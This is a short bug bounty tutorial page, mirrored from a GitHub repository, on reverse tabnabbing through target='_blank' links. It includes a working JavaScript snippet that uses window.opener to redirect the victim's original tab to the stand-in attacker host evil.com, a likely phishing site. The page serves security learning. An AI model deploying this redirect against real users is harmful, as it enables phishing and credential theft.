mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-24 21:35:25 +00:00
969 B
969 B
Tabnabbing
Introduction
When you open a link in a new tab ( target="_blank" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property.
How to find
<a href="..." target="_blank" rel="" />
<a href="..." target="_blank" />
How to Exploit
- Attacker posts a link to a website under his control that contains the following JS code:
<html> <script> if (window.opener) window.opener.parent.location.replace('http://evil.com'); if (window.parent != window) window.parent.location.replace('http://evil.com'); </script> </html>
- He tricks the victim into visiting the link, which is opened in the browser in a new tab.
- At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.